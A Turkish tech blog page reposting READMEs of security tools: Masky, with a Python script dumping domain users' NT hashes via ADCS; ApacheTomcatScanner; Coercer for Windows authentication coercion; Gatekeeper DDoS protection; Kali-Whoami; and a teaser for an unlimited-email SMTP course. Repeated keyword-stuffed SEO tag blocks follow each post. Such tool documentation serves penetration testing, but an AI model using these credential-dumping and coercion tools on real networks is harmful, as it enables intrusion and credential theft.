İçeriğe geç
  • osint
  • Ana Sayfa
  • iPhone
  • Hakkımda
  • CMD KOMUT ISTEMCISI
  • Windows
  • iPhone
  • Bloglar
  • Bloglar
  • osint
  • Ana Sayfa
  • iPhone
  • Hakkımda
  • CMD KOMUT ISTEMCISI
  • Windows
  • iPhone
  • Bloglar
  • Bloglar

Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu

Teknoloji blogu! Türkiye'nin en büyük teknoloji blogu cybersecurityplus.code.blog üzerinden en güncel teknoloji blog, methodları öğren son dakika gelişmeler

Menü
Sosyal Bağlantılar
Ara

hürriyet

Masky, bir ADCS sayesinde etki alanı kullanıcılarının kimlik bilgilerini uzaktan boşaltmak için alternatif bir yol sağlayan bir python kitaplığıdır . PFX, NT karmaları ve TGT’yi daha geniş bir kapsamda kolayca toplamak için bu kitaplığın üzerine bir komut satırı aracı oluşturulmuştur.

Bu araç, herhangi bir yeni güvenlik açığından yararlanmaz ve LSASS işlem belleğini boşaltarak çalışmaz. Aslında, yalnızca meşru Windows ve Active Directory özelliklerinden yararlanır (belirteç kimliğine bürünme, kerberos aracılığıyla sertifika doğrulama ve PKINIT aracılığıyla NT karmaları alma). Uygulanan teknikleri ve Masky’nin nasıl çalıştığını detaylandırmak için bir blog yazısı yayınlandı.

Masky kaynak kodu büyük ölçüde harika Certify ve Certipy araçlarına dayanmaktadır. ADCS’ye karşı saldırgan istismar teknikleri ile ilgili araştırmalar için yazarlarına gerçekten teşekkür ederim (bkz. Teşekkürler bölümü ).

Kurulum

Masky python3 kitaplığı ve ilişkili CLI’si, genel PyPi deposu aracılığıyla aşağıdaki gibi kolayca kurulabilir:

pip install masky

Masky aracısı yürütülebilir dosyası zaten PyPi paketine dahil edilmiştir.

Ayrıca, aracıyı değiştirmeniz gerekirse, C# kodu içinde bulunan bir Visual Studio projesi aracılığıyla yeniden derlenebilir agent/Masky.sln. İnşa edilmesini gerektirecektir .NET Framework 4.

kullanım

Masky bir Python kütüphanesi olarak tasarlanmıştır. Ayrıca, pentest veya RedTeam aktiviteleri sırasında kullanımını kolaylaştırmak için üzerine bir komut satırı arayüzü oluşturuldu.

CA serverHer iki kullanım için de, önce bir ADCS aracılığıyla CA namedağıtılan a’nın FQDN’sini almanız gerekir . certipy findBu bilgiler, seçenek veya yerleşik Microsoft certutil.exearacı aracılığıyla kolayca alınabilir . UserHedeflenen CA’da varsayılan şablonun etkinleştirildiğinden emin olun .

RasAutoUyarı: Masky, mevcut hizmetin değiştirilmesi yoluyla her hedefe bir yürütülebilir dosya dağıtır . İlk değerinin otomatik olarak geri alınmasına rağmen, ImagePathMasky çalışma zamanı sırasında beklenmeyen bir hata temizleme aşamasını atlayabilir. Bu nedenle, böyle bir istenmeyen duruş durumunda orijinal değeri manuel olarak sıfırlamayı unutmayın.

Komut satırı

Aşağıdaki demo, 4 uzak sistemi hedefleyerek Masky’nin temel kullanımını göstermektedir. Yürütülmesi, sec.lab test etki alanından 3 farklı etki alanı kullanıcısının NT karmalarını, CCACHE ve PFX’lerini toplamaya izin verir.

Masky ayrıca bu tür araçlar tarafından yaygın olarak sağlanan seçenekleri de sağlar (iş parçacığı numarası, kimlik doğrulama modu, dosyalardan yüklenen hedefler vb.).

  __  __           _ |  \/  | __ _ ___| | ___   _ | |\/| |/ _` / __| |/ / | | | | |  | | (_| \__ \   <| |_| | |_|  |_|\__,_|___/_|\_\__,  |  v0.0.3                 |___/usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]             [targets ...]positional arguments:  targets               Targets in CIDR, hostname and IP formats are accepted, from a file or notoptions:  -h, --help            show this help message and exit  -v, --verbose         Enable debugging messages  -ts, --timestamps     Display timestamps for each log  -t THREADS, --threads THREADS                        Threadpool size (max 15)Authentication:  -d DOMAIN, --domain DOMAIN                        Domain name to authenticate to  -u USER, --user USER  Username to au   thenticate with  -p PASSWORD, --password PASSWORD                        Password to authenticate with  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.  -H HASHES, --hashes HASHES                        Hashes to authenticate with (LM:NT, :NT or :LM)Connection:  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter  -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY                        Certificate Authority Name (SERVER\CA_NAME)Results:  -nh, --no-hash        Do not request NT hashes  -nt, --no-ccache      Do not save ccache files  -np, --no-pfx         Do not save pfx files  -o OUTPUT, --output OUTPUT                        Local path to a folder where Masky results will be stored (automatically creates the folde   r if it does not exit)

Python kitaplığı

Aşağıda, uzak bir hedeften çalışan etki alanı kullanıcı oturumlarının sırlarını toplamak için Masky kitaplığını kullanan basit bir komut dosyası verilmiştir.

from masky import Maskyfrom getpass import getpassdef dump_nt_hashes():    # Define the authentication parameters    ca = "srv-01.sec.lab\sec-SRV-01-CA"    dc_ip = "192.168.23.148"    domain = "sec.lab"    user = "askywalker"    password = getpass()    # Create a Masky instance with these credentials    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)    # Set a target and run Masky against it    target = "192.168.23.130"    rslts = m.run(target)    # Check if Masky succesfully hijacked at least a user session    # or if an unexpected error occured    if not rslts:        return False    # Loop on MaskyResult object to display hijacked users and to retreive their NT hashes    print(f"Results from hostname: {rslts.hostname}")    for user in rslts.users:        print(f"\t - {user.domain}\{user.n   ame} - {user.nt_hash}")    return Trueif __name__ == "__main__":    dump_nt_hashes()

Yürütülmesi aşağıdaki çıktıyı üretir.

$> python3 .\masky_demo.pyPassword:Results from hostname: SRV-01         - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157         - sec\askywalker - 8928e0723012a8471c0084149c4e23b1         - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

Masky’nin başarılı bir şekilde yürütülmesinden sonra nesnelerin MaskyResultslistesini içeren bir nesne döndürülür .User

Lütfen masky\lib\results.pybu iki sınıf tarafından sağlanan yöntemleri ve nitelikleri kontrol etmek için modüle bakın.

Teşekkür

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

ApacheTomcatScanner – Apache Tomcat Sunucu Güvenlik Açıklarını Taramak İçin Bir Python Komut Dosyası

Apache Tomcat sunucu güvenlik açıklarını taramak için bir python betiği.

Özellikler

  • Apache Tomcat sunucularını aramak için çok iş parçacıklı işçiler.
  • Çoklu hedef kaynak mümkün:
    • Bir hedef listesi olarak kullanmak için bir LDAP sorgusu aracılığıyla bir Windows etki alanından bilgisayarların listesini alma .
    • Hedefleri bir dosyadan satır satır okumak.
    • Seçenekten bireysel hedeflerin (IP/DNS/CIDR) okunması -tt/--target.
  • Test edilecek bağlantı noktalarının özel listesi.
  • /manager/htmlErişim ve varsayılan kimlik bilgileri için testler .
  • --list-cvesSeçenek ile her sürümün CVE’lerini listeleyin


Kurulum

Şimdi bu komutla pypi’den yükleyebilirsiniz:

sudo python3 -m pip install apachetomcatscanner

kullanım

$ ./ApacheTomcatScanner.py -hApache Tomcat Scanner v2.3.2 - by @podalirius_usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE]                              [-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]A python script to scan for Apache Tomcat server vulnerabilities.optional arguments:  -h, --help            show this help message and exit  -v, --verbose         Verbose mode. (default: False)  --debug               Debug mode, for huge verbosity. (default: False)  -C, --list-cves       List CVE ids affecting each version found. (default: False)  -T THREADS, --threads THREADS                        Number of threads (default: 5)  -s, --servers-only    If querying ActiveDirectory, only get servers and not all computer objects. (default: False)  --only-http           Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs)  --only-https          Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs)  --no-check-certificate                        Do not check certificate. (default: False)  --xlsx XLSX           Export results to XLSX  --json JSON           Export results to JSON  -PI PROXY_IP, --proxy-ip PROXY_IP                        Proxy IP.  -PP PROXY_PORT, --proxy-port PROXY_PORT                        Proxy port  -rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT  -tf TARGETS_FILE, --targets-file TARGETS_FILE                        Path to file containing a line by line list of targets.  -tt TARGET, --target TARGET                        Target IP, FQDN or CIDR  -tp TARGET_PORTS, --target-ports TARGET_PORTS                        Target ports to scan top search for Apache Tomcat servers.  -ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN                        Windows domain to authenticate to.  -ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP                        IP of the domain controller.  -au AUTH_USER, --auth-user AUTH_USER                        Username of the domain account.  -ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD                        Password of the domain account.  -ah AUTH_HASH, --auth-hash AUTH_HASH                        LM:NT hashes to pass the hash for this user.

Örnek

Ayrıca, her sürümün CVE’lerini şu --list-cvesseçenekle listeleyebilirsiniz:

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Coercer – Bir Windows Sunucusunu 9 Yöntemle Rastgele Bir Makinede Kimlik Doğrulaması İçin Otomatik Olarak Zorlamak İçin Bir Python Komut Dosyası

Bir Windows sunucusunu 9 yöntemle rastgele bir makinede kimlik doğrulaması yapmaya otomatik olarak zorlamak için bir python betiği.


Özellikler

  • Uzak makinedeki açık SMB borularını otomatik olarak algılar.
  • Sunucuyu rastgele bir makinede kimlik doğrulaması yapmaya zorlamak için tüm savunmasız RPC işlevlerini tek tek çağırır.
  • Zorlanmış bir kimlik doğrulaması gerçekleştirmeden yalnızca savunmasız protokolleri ve dinleme işlevlerini --analyzelisteleyen ile modu analiz edin .
  • Bir dosyadan bir hedef listesine zorlama saldırısı gerçekleştirin.--targets-file
  • --webdav-hostve ile bir WebDAV hedefine zorlama--webdav-port

kullanım

$ ./Coercer.py -h                                                                                                         ______                                    / ____/___  ___  _____________  _____     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/    / /___/ /_/ /  __/ /  / /__/  __/ /      v1.6    \____/\____/\___/_/   \___/\___/_/       by @podalirius_usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]                  (-t TARGET | -f TARGETS_FILE) [--target-ip ip address]Automatic windows authentication coercer over various RPC calls.options:  -h, --help            show this help message and exit  -u USERNAME, --username USERNAME                        Username to authenticate to the endpoint.  -p PASSWORD, --password PASSWORD                        Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)  -d DOMAIN, --domain DOMAIN                        Windows domain name to authenticate to the endpoint.  --hashes [LMHASH]:NTHASH                        NT/LM hashes (LM hash can be empty)  --no-pass             Don't ask for password (useful for -k)  -v, --verbose         Verbose mode (default: False)  -a, --analyze         Analyze mode (default: Attack mode)  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the                        command line  --dc-ip ip address    IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter  -t TARGET, --target TARGET                        IP address or hostname of the target machine  -f TARGETS_FILE, --targets-file TARGETS_FILE                        IP address or hostname of the target machine  --target-ip ip address                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it  -l LISTENER, --listener LISTENER                        IP address or hostname of the listener machine  -wh WEBDAV_HOST, --webdav-host WEBDAV_HOST                        WebDAV IP of the server to authenticate to.  -wp WEBDAV_PORT, --webdav-port WEBDAV_PORT                        WebDAV port of the server to authenticate to.

Örnek çıktı

Saldırı modunda ( --analyzeseçeneksiz) aşağıdaki çıktıyı alırsınız:

Tüm RPC çağrılarından sonra, Responder’da çok sayıda kimlik doğrulaması alırsınız:

Katkı

Çekme istekleri kabul edilir. Başka özellikler eklemek istiyorsanız bir konu açmaktan çekinmeyin.

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Gatekeeper – İlk Açık Kaynak DDoS Koruma Sistemi

Gatekeeper, ilk açık kaynaklı DoS koruma sistemidir. Herhangi bir en yüksek bant genişliğine ölçeklendirilmek üzere tasarlanmıştır, böylece hem bugünün hem de yarının DoS saldırılarına dayanabilir. Gatekeeper’ın coğrafi olarak dağıtılmış mimarisine rağmen, gelen trafik üzerinde uygulanması gereken tüm kararları tanımlayan ağ politikası merkezileştirilmiştir. Bu merkezileştirilmiş politika, ağ operatörlerinin çok yüksek gecikme süresi (örneğin dağıtılmış veri tabanları) altında geçerli olmayacak dağıtılmış algoritmalardan yararlanmasına ve aynı anda birden çok çok vektörlü DoS saldırısıyla mücadele etmesine olanak tanır.

Gatekeeper’ın hedef kullanıcıları, kurumların, hizmet ve içerik sağlayıcıların, kurumsal ağların vb. ağ operatörleridir. Bireysel İnternet kullanıcıları tarafından kullanılması amaçlanmamıştır.

Daha fazla bilgi için Gatekeeper wiki’sine bakın .

Hugepages Yapılandırması Nasıl Kurulur

DPDK, büyük sayfaların kullanılmasını gerektirir; dev sayfaların montajına ilişkin talimatlar gereksinim belgelerinde mevcuttur . Birçok sistemde aşağıdaki büyük sayfalar kurulumu yeterlidir:

$ echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

Seçenek 1: Paketleri Alın

Gatekeeper için Debian paketleri projenin Yayınlar sayfasında mevcuttur.
Düzenlemek

Paketler indirildikten sonra aşağıdaki komutlarla yüklenebilirler:

$ tar -zxvf gatekeeper-ubuntu-18.04-packages.tar.gz$ cd gatekeeper-ubuntu-18.04-packages$ sudo dpkg -i libgkrte-*.deb \    libgkdpdk-dev_*_amd64.deb \    gatekeeper-dpdk_*_amd64.deb \    gatekeeper-dpdk-dev_*_amd64.deb \    gatekeeper-dpdk-igb-uio-dkms_*_amd64.deb \    gatekeeper-dpdk-rte-kni-dkms_*_amd64.deb \    gatekeeper-bird_*_amd64.deb \    gatekeeper_*_amd64.deb

Paket gatekeeper-dpdk-dev, paket kurulumu ve çekirdek yükseltmeleri sırasında ilgili çekirdek modüllerini oluşturan DKMS paketlerinin bir bağımlılığıdır.
Ağ Bağdaştırıcılarını Yapılandırma

Dosyayı düzenleyin /etc/gatekeeper/envvarsve DPDK’ya bağlanacak ağ bağdaştırıcılarının adlarını girin. Örneğin:

GATEKEEPER_INTERFACES="eth0 eth1"

Alternatif olarak, arabirimlerin PCI adresleri belirtilebilir:

GATEKEEPER_INTERFACES="0000:00:07.0 0000:00:08.0"

Aynı dosyada, isteğe bağlı olarak değişkende Çevresel Soyutlama Katmanı seçeneklerini ve .DPDK_ARGSGATEKEEPER_ARGS
nasıl çalıştırılır

Gatekeeper’ı başlatmak ve yeniden başlatmalarda otomatik olarak başlatılmasını sağlamak için aşağıdaki komutları çalıştırın.

$ sudo systemctl start gatekeeper$ sudo systemctl enable gatekeeper

Seçenek 2: Kaynak

Yükleme Bağımlılıklarından Derleme

Aşağıdaki yazılım bağımlılıklarını yükleyin:

$ sudo apt-get update$ sudo apt-get -y -q install git clang devscripts doxygen hugepages \build-essential linux-headers-`uname -r` libmnl0 libmnl-dev \libkmod2 libkmod-dev libnuma-dev libelf1 libelf-dev libc6-dev-i386 \autoconf flex bison libncurses5-dev libreadline-dev

Not: Derlemek ve çalıştırmak için hem libmnl0ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . Derlemek ve çalıştırmak için hem ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . en son DPDK’yı derlemek ve NUMA sistemlerini desteklemek için gereklidir. Paket , DPDK’yı ELF dosyalarından BPF programlarını okuma desteğiyle derlemek için gereklidir, ancak yalnızca onu çalıştırmak için gereklidir. Paket , klasördeki BPF programlarını derlemek için gereklidir . , , , ve paketleri BIRD içindir . Paket , Gatekeeper Debian paketleri oluşturmak için kullanılır .libmnl-devgatekeeperlibmnl0gatekeeperlibkmod2libkmod-devgatekeeperlibkmod2gatekeeperlibnuma-devlibelf-devlibelf1libc6-dev-i386bpf/autoconfflexbisonlibncurses5-devlibreadline-devdevscripts

DPDK’yı kullanmak için tüm çevresel gereksinimlere sahip olduğunuzdan emin olun .
Klon Deposu

Gatekeeper bağımlılıklarını içeren alt modüller dahil olmak üzere Gatekeeper deposunu klonlayın:

$ git clone --recursive http://github.com/AltraMayor/gatekeeper.git

Klon seçeneğini kullanmazsanız , bağımlılıkları içeren alt modülleri dizin --recursiveiçinden almanız gerekir :gatekeeper

$ git submodule init$ git submodule update

derlemek

Bu bölüm Gatekeeper’ın manuel olarak nasıl oluşturulacağını açıklar. Debian paketleri oluşturmak istiyorsanız, Paketler nasıl oluşturulur bölümüne bakın .

Dizindeyken gatekeeperkurulum komut dosyasını çalıştırın:

$ . setup.sh

Bu komut dosyası DPDK, LuaJIT ve BIRD’yi derler ve gerekli çekirdek modüllerini yükler. Ayrıca, arabirim adlarını ve ilgili PCI adreslerini dosyaya kaydeder, lua/if_map.luaböylece arabirim adları Gatekeeper yapılandırma dosyalarında kullanılabilir.

Ayrıca iki çevresel değişken belirler: RTE_SDKve RTE_TARGET. Derlemeden önce ayarlanmaları gerekir gatekeeper.

Kurulum komut dosyasını çalıştırdıktan sonra, çevresel değişkenleri kabuğunuzun tercihler dosyasına kaydetmek isteyebilirsiniz. Örneğin, Bash’de şunları yapabilirsiniz:

$ echo "export RTE_SDK=${RTE_SDK}" >> ${HOME}/.profile$ echo "export RTE_TARGET=${RTE_TARGET}" >> ${HOME}/.profile

Aksi takdirde, her giriş yaptığınızda bu çevresel değişkenleri yeniden ayarlamanız gerekecektir.

DPDK derlenip değişkenler ayarlandıktan gatekeepersonra derlenebilir:

$ make

Ağ Bağdaştırıcılarını Yapılandırma

Ağ bağdaştırıcılarının kullanılmadan önce gatekeeperDPDK’ya bağlanması gerekir. Bunun için scripti kullanabilirsiniz dependencies/dpdk/usertools/dpdk-devbind.py. Örneğin:

$ sudo dependencies/dpdk/usertools/dpdk-devbind.py --bind=uio_pci_generic enp131s0f0

enp131s0f0Bu komut, arabirimi sürücüye bağlar, uio_pci_genericböylece çerçeveler çekirdek yerine doğrudan DPDK’ya iletilebilir. Bu bağlamanın yukarıdaki adımlarda Gatekeeper ayarlandıktan sonra gerçekleşmesi gerektiğini unutmayın, böylece bağlı arabirim lua/if_map.lua.
Nasıl Çalıştırılır

Derlendikten gatekeeperve ortam doğru şekilde yapılandırıldıktan sonra şunu çalıştırın:

$ sudo build/gatekeeper [EAL OPTIONS] -- [GATEKEEPER OPTIONS]

Nerede [EAL OPTIONS]çift çizgiden önce belirtilir ve DPDK’nın Çevresel Soyutlama Katmanı için parametreleri temsil eder ve [GATEKEEPER OPTIONS]çift çizgiden sonra belirtilir ve Gatekeeper’a özgü seçenekleri temsil eder .

DPDK’daki cihaz ve bellek yapılandırması dahil olmak üzere sistemin erken yapılandırması stdout’a kaydedilecektir. Gatekeeper başlatıldığında, tüm bilgiler Gatekeeper günlüğüne gönderilir.
Paketler nasıl oluşturulur

Gatekeeper Debian paketleri aşağıdaki komutlarla oluşturulabilir. Depo kökünden çalıştırılmaları amaçlanmıştır ve git alt modüllerinin çekildiğini ve yukarıda belirtildiği gibi yapı bağımlılıklarının kurulduğunu varsayarlar. Gatekeeper ve alt modüller, paket oluşturma işlemi sırasında otomatik olarak derlenecektir.

$ tar --exclude-vcs -Jcvf ../gatekeeper_1.0.0.orig.tar.xz -C .. gatekeeper$ debuild -uc -us

Gatekeeper paketi üst dizinde mevcut olacaktır.

Gatekeeper’ı İndir

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Kali-Whoami – Sizi Kali Linux’ta En Üst Düzeyde Anonim Tutmak İçin Geliştirilmiş Bir Gizlilik Aracı

Whoami aracının amacı, sizi Kali linux üzerinde mümkün olduğunca anonim kılar . Kullanım kolaylığı ve basit arayüzü ile kullanıcı dostudur . Mümkün olan en yüksek anonimlik seviyesini sağlamak için iki farklı yol izler.

Son olarak, internette asla yüzde yüz güvenlik olmadığını unutmayın!

Özellikler

  • anti mitm
  • Günlük katili
  • IP değiştirici
  • DNS değiştirici
  • Mac değiştirici
  • Anti soğuk çizme
  • saat dilimi değiştirici
  • ana bilgisayar adı değiştirici
  • Tarayıcı anonimleştirme

Başlarken

Sisteminizi düzenli olarak güncellemezseniz veya bu paketleri sisteminize yüklemediyseniz aracı kullanamazsınız. Öyleyse kurulumdan önce neye ihtiyacımız olduğunu ve nasıl indirebileceğimizi görelim.

  • Tüm bağımlılıkları aşağıdaki komutla indirebilir veya güncel olup olmadığını kontrol edebilirsiniz.tor curl python3 python3-scapy ağ yöneticisi “>sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager

Kurulum

  1. Depoyu klonlagit clone https://github.com/omer-dogan/kali-whoami
  2. makefile’ı yüklesudo make install

İşte bu kadar, artık aleti çalıştırmaya hazırsınız!
kullanım

Kurulumu tamamladıktan sonra, arama menüsüne “Kali Whoami” yazarak veya bir terminalde “sudo kali-whoami –help” yazarak uygulamayı çalıştırın.olası bir hata durumunda sistemi onarın. –help : Bu, menüyü gösterir. “>

[+] Usage : sudo kali-whoami [option]--start  :   It will make backups and start the program.--stop   :   Closes the program using a backup.--status :   Provides information about working status.--fix    :   Used to repair the system in case of a possible bug.--help   :   This shows the menu.

Demo

Kali-Whoami’yi indirin

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Kendi SMTP E-posta Sunucunuzu Oluşturun: – Sınırsız E-posta Gönderin

 Udemy Bu Kursu Yasakladı

⚙️ Kurs Hakkında: –
Webmin ve Linux ile Kendi SMTP Posta Sunucunuzu Nasıl Oluşturacağınızı ve Yapılandıracağınızı Öğrenin

Öğrenecekleriniz:-
🔻 Kendi Posta sunucunuzu Kullanarak E-posta Gönderin ve Alın.
🔻 Gmail veya Outlook gibi Kendi Posta Sistemlerinizi oluşturun.
🔻 Amazon Web hizmetleri EC2 ile nasıl çalışacağınızı öğrenin.
